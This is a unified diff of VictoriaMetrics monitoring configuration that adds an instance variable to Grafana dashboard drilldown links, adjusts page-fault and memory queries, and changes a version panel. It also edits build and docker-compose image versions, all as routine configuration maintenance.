"mappings": [],
|
||||
@@ -1644,12 +1644,12 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown - RSS memory usage",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=148&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=148&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
},
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown - Memory usage breakdown",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=141&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=141&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1764,7 +1764,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=151&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=151&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1882,7 +1882,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=149&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=149&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5122,7 +5122,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=140&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=140&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5174,7 +5174,7 @@
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job) > 0",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job)",
|
||||
"legendFormat": "__auto",
|
||||
"range": true,
|
||||
"refId": "A"
|
||||
@@ -5356,7 +5356,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=150&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=150&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5973,7 +5973,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=153&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=153&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -6237,7 +6237,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=152&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=152&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -7667,7 +7667,7 @@
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job,instance) > 0",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job,instance)",
|
||||
"legendFormat": "{{instance}} ({{job}})",
|
||||
"range": true,
|
||||
"refId": "A"
|
||||
|
||||
@@ -92,72 +92,29 @@
|
||||
"type": "row"
|
||||
},
|
||||
{
|
||||
"datasource": {
|
||||
"type": "victoriametrics-metrics-datasource",
|
||||
"uid": "$ds"
|
||||
},
|
||||
"fieldConfig": {
|
||||
"defaults": {
|
||||
"color": {
|
||||
"mode": "thresholds"
|
||||
},
|
||||
"mappings": [],
|
||||
"thresholds": {
|
||||
"mode": "absolute",
|
||||
"steps": [
|
||||
{
|
||||
"color": "green",
|
||||
"value": 0
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"defaults": {},
|
||||
"overrides": []
|
||||
},
|
||||
"gridPos": {
|
||||
"h": 4,
|
||||
"h": 3,
|
||||
"w": 4,
|
||||
"x": 0,
|
||||
"y": 1
|
||||
},
|
||||
"id": 24,
|
||||
"options": {
|
||||
"colorMode": "value",
|
||||
"graphMode": "none",
|
||||
"justifyMode": "auto",
|
||||
"orientation": "auto",
|
||||
"percentChangeColorMode": "standard",
|
||||
"reduceOptions": {
|
||||
"calcs": [
|
||||
"lastNotNull"
|
||||
],
|
||||
"fields": "/^short_version$/",
|
||||
"values": false
|
||||
"code": {
|
||||
"language": "plaintext",
|
||||
"showLineNumbers": false,
|
||||
"showMiniMap": false
|
||||
},
|
||||
"showPercentChange": false,
|
||||
"textMode": "value",
|
||||
"wideLayout": true
|
||||
"content": "<div style=\"text-align: center;\">$version</div>",
|
||||
"mode": "markdown"
|
||||
},
|
||||
"pluginVersion": "12.3.0",
|
||||
"targets": [
|
||||
{
|
||||
"datasource": {
|
||||
"type": "victoriametrics-metrics-datasource",
|
||||
"uid": "$ds"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"exemplar": false,
|
||||
"expr": "vm_app_version{job=~\"$job\",instance=~\"$instance\"}",
|
||||
"format": "table",
|
||||
"instant": true,
|
||||
"interval": "",
|
||||
"legendFormat": "{{short_version}}",
|
||||
"range": false,
|
||||
"refId": "A"
|
||||
}
|
||||
],
|
||||
"title": "Version",
|
||||
"type": "stat"
|
||||
"type": "text"
|
||||
},
|
||||
{
|
||||
"datasource": {
|
||||
|
||||
@@ -1522,7 +1522,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=203&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=203&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1651,12 +1651,12 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown - RSS memory usage",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=189&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=189&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
},
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown - Memory usage breakdown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=225&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=225&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1771,7 +1771,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=192&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=192&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1889,7 +1889,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=190&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=190&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5078,7 +5078,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=224&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=224&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5130,7 +5130,7 @@
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job) > 0",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job)",
|
||||
"legendFormat": "__auto",
|
||||
"range": true,
|
||||
"refId": "A"
|
||||
@@ -6108,7 +6108,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=192&var-job=$job_storage&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=192&var-job=$job_storage&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -6258,7 +6258,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=190&var-job=$job_storage&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=190&var-job=$job_storage&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -6909,7 +6909,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=200&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=200&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -7179,7 +7179,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=201&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=201&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -8043,7 +8043,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=192&var-job=$job_select&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=192&var-job=$job_select&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -8187,7 +8187,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=190&var-job=$job_select&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=190&var-job=$job_select&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -9376,7 +9376,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=192&var-job=$job_insert&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=192&var-job=$job_insert&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -9520,7 +9520,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=190&var-job=$job_insert&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz_vm?viewPanel=190&var-job=$job_insert&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -11154,7 +11154,7 @@
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job,instance) > 0",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job,instance)",
|
||||
"legendFormat": "{{instance}} ({{job}})",
|
||||
"range": true,
|
||||
"refId": "A"
|
||||
|
||||
@@ -1522,7 +1522,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=154&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=154&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1645,12 +1645,12 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown - RSS memory usage",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=148&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=148&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
},
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown - Memory usage breakdown",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=141&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=141&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1765,7 +1765,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=151&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=151&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1883,7 +1883,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=149&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=149&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5123,7 +5123,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=140&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=140&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5175,7 +5175,7 @@
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job) > 0",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job)",
|
||||
"legendFormat": "__auto",
|
||||
"range": true,
|
||||
"refId": "A"
|
||||
@@ -5357,7 +5357,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=150&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=150&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5974,7 +5974,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=153&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=153&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -6238,7 +6238,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=152&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk_vm?viewPanel=152&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -7668,7 +7668,7 @@
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job,instance) > 0",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job,instance)",
|
||||
"legendFormat": "{{instance}} ({{job}})",
|
||||
"range": true,
|
||||
"refId": "A"
|
||||
|
||||
@@ -964,7 +964,7 @@
|
||||
"links": [
|
||||
{
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=123&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=123&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1231,7 +1231,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=162&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=162&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1743,7 +1743,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=117&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=117&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1858,7 +1858,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=119&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=119&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -2332,7 +2332,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=121&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz_vm?viewPanel=121&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
|
||||
@@ -1612,7 +1612,7 @@
|
||||
"type": "victoriametrics-metrics-datasource",
|
||||
"uid": "$ds"
|
||||
},
|
||||
"expr": "sum(go_memstats_sys_bytes{job=~\"$job\", instance=~\"$instance\"})",
|
||||
"expr": "sum(go_memstats_sys_bytes{job=~\"$job\", instance=~\"$instance\"}) + sum(vm_cache_size_bytes{job=~\"$job\", instance=~\"$instance\"})",
|
||||
"format": "time_series",
|
||||
"hide": false,
|
||||
"intervalFactor": 1,
|
||||
@@ -1624,7 +1624,7 @@
|
||||
"type": "victoriametrics-metrics-datasource",
|
||||
"uid": "$ds"
|
||||
},
|
||||
"expr": "sum(go_memstats_heap_inuse_bytes{job=~\"$job\", instance=~\"$instance\"})",
|
||||
"expr": "sum(go_memstats_heap_inuse_bytes{job=~\"$job\", instance=~\"$instance\"}) + sum(vm_cache_size_bytes{job=~\"$job\", instance=~\"$instance\"})",
|
||||
"format": "time_series",
|
||||
"hide": false,
|
||||
"intervalFactor": 1,
|
||||
|
||||
@@ -963,7 +963,7 @@
|
||||
"links": [
|
||||
{
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=123&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=123&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1230,7 +1230,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=162&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=162&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1742,7 +1742,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=117&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=117&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1857,7 +1857,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=119&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=119&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -2331,7 +2331,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=121&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/G7Z9GzMGz?viewPanel=121&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
|
||||
@@ -1611,7 +1611,7 @@
|
||||
"type": "prometheus",
|
||||
"uid": "$ds"
|
||||
},
|
||||
"expr": "sum(go_memstats_sys_bytes{job=~\"$job\", instance=~\"$instance\"})",
|
||||
"expr": "sum(go_memstats_sys_bytes{job=~\"$job\", instance=~\"$instance\"}) + sum(vm_cache_size_bytes{job=~\"$job\", instance=~\"$instance\"})",
|
||||
"format": "time_series",
|
||||
"hide": false,
|
||||
"intervalFactor": 1,
|
||||
@@ -1623,7 +1623,7 @@
|
||||
"type": "prometheus",
|
||||
"uid": "$ds"
|
||||
},
|
||||
"expr": "sum(go_memstats_heap_inuse_bytes{job=~\"$job\", instance=~\"$instance\"})",
|
||||
"expr": "sum(go_memstats_heap_inuse_bytes{job=~\"$job\", instance=~\"$instance\"}) + sum(vm_cache_size_bytes{job=~\"$job\", instance=~\"$instance\"})",
|
||||
"format": "time_series",
|
||||
"hide": false,
|
||||
"intervalFactor": 1,
|
||||
|
||||
@@ -7,7 +7,7 @@ ROOT_IMAGE ?= alpine:3.23.3
|
||||
ROOT_IMAGE_SCRATCH ?= scratch
|
||||
CERTS_IMAGE := alpine:3.23.3
|
||||
|
||||
GO_BUILDER_IMAGE := golang:1.26.1
|
||||
GO_BUILDER_IMAGE := golang:1.26.0
|
||||
|
||||
BUILDER_IMAGE := local/builder:2.0.0-$(shell echo $(GO_BUILDER_IMAGE) | tr :/ __)-1
|
||||
BASE_IMAGE := local/base:1.1.4-$(shell echo $(ROOT_IMAGE) | tr :/ __)-$(shell echo $(CERTS_IMAGE) | tr :/ __)
|
||||
@@ -100,7 +100,6 @@ publish-via-docker:
|
||||
) \
|
||||
-o type=image \
|
||||
--provenance=false \
|
||||
--sbom=true \
|
||||
-f app/$(APP_NAME)/multiarch/Dockerfile \
|
||||
--push \
|
||||
bin
|
||||
@@ -121,7 +120,6 @@ publish-via-docker:
|
||||
) \
|
||||
-o type=image \
|
||||
--provenance=false \
|
||||
--sbom=true \
|
||||
-f app/$(APP_NAME)/multiarch/Dockerfile \
|
||||
--push \
|
||||
bin
|
||||
|
||||
@@ -3,7 +3,7 @@ services:
|
||||
# It scrapes targets defined in --promscrape.config
|
||||
# And forward them to --remoteWrite.url
|
||||
vmagent:
|
||||
image: victoriametrics/vmagent:v1.137.0
|
||||
image: victoriametrics/vmagent:v1.136.0
|
||||
depends_on:
|
||||
- "vmauth"
|
||||
ports:
|
||||
@@ -33,19 +33,18 @@ services:
|
||||
- ./../../dashboards/vmagent.json:/var/lib/grafana/dashboards/vmagent.json
|
||||
- ./../../dashboards/vmalert.json:/var/lib/grafana/dashboards/vmalert.json
|
||||
- ./../../dashboards/vmauth.json:/var/lib/grafana/dashboards/vmauth.json
|
||||
- ./../../dashboards/alert-statistics.json:/var/lib/grafana/dashboards/alert-statistics.json
|
||||
|
||||
# vmstorage shards. Each shard receives 1/N of all metrics sent to vminserts,
|
||||
# where N is number of vmstorages (2 in this case).
|
||||
vmstorage-1:
|
||||
image: victoriametrics/vmstorage:v1.137.0-cluster
|
||||
image: victoriametrics/vmstorage:v1.136.0-cluster
|
||||
volumes:
|
||||
- strgdata-1:/storage
|
||||
command:
|
||||
- "--storageDataPath=/storage"
|
||||
restart: always
|
||||
vmstorage-2:
|
||||
image: victoriametrics/vmstorage:v1.137.0-cluster
|
||||
image: victoriametrics/vmstorage:v1.136.0-cluster
|
||||
volumes:
|
||||
- strgdata-2:/storage
|
||||
command:
|
||||
@@ -55,7 +54,7 @@ services:
|
||||
# vminsert is ingestion frontend. It receives metrics pushed by vmagent,
|
||||
# pre-process them and distributes across configured vmstorage shards.
|
||||
vminsert-1:
|
||||
image: victoriametrics/vminsert:v1.137.0-cluster
|
||||
image: victoriametrics/vminsert:v1.136.0-cluster
|
||||
depends_on:
|
||||
- "vmstorage-1"
|
||||
- "vmstorage-2"
|
||||
@@ -64,7 +63,7 @@ services:
|
||||
- "--storageNode=vmstorage-2:8400"
|
||||
restart: always
|
||||
vminsert-2:
|
||||
image: victoriametrics/vminsert:v1.137.0-cluster
|
||||
image: victoriametrics/vminsert:v1.136.0-cluster
|
||||
depends_on:
|
||||
- "vmstorage-1"
|
||||
- "vmstorage-2"
|
||||
@@ -76,7 +75,7 @@ services:
|
||||
# vmselect is a query fronted. It serves read queries in MetricsQL or PromQL.
|
||||
# vmselect collects results from configured `--storageNode` shards.
|
||||
vmselect-1:
|
||||
image: victoriametrics/vmselect:v1.137.0-cluster
|
||||
image: victoriametrics/vmselect:v1.136.0-cluster
|
||||
depends_on:
|
||||
- "vmstorage-1"
|
||||
- "vmstorage-2"
|
||||
@@ -86,7 +85,7 @@ services:
|
||||
- "--vmalert.proxyURL=http://vmalert:8880"
|
||||
restart: always
|
||||
vmselect-2:
|
||||
image: victoriametrics/vmselect:v1.137.0-cluster
|
||||
image: victoriametrics/vmselect:v1.136.0-cluster
|
||||
depends_on:
|
||||
- "vmstorage-1"
|
||||
- "vmstorage-2"
|
||||
@@ -101,7 +100,7 @@ services:
|
||||
# read requests from Grafana, vmui, vmalert among vmselects.
|
||||
# It can be used as an authentication proxy.
|
||||
vmauth:
|
||||
image: victoriametrics/vmauth:v1.137.0
|
||||
image: victoriametrics/vmauth:v1.136.0
|
||||
depends_on:
|
||||
- "vmselect-1"
|
||||
- "vmselect-2"
|
||||
@@ -115,7 +114,7 @@ services:
|
||||
|
||||
# vmalert executes alerting and recording rules
|
||||
vmalert:
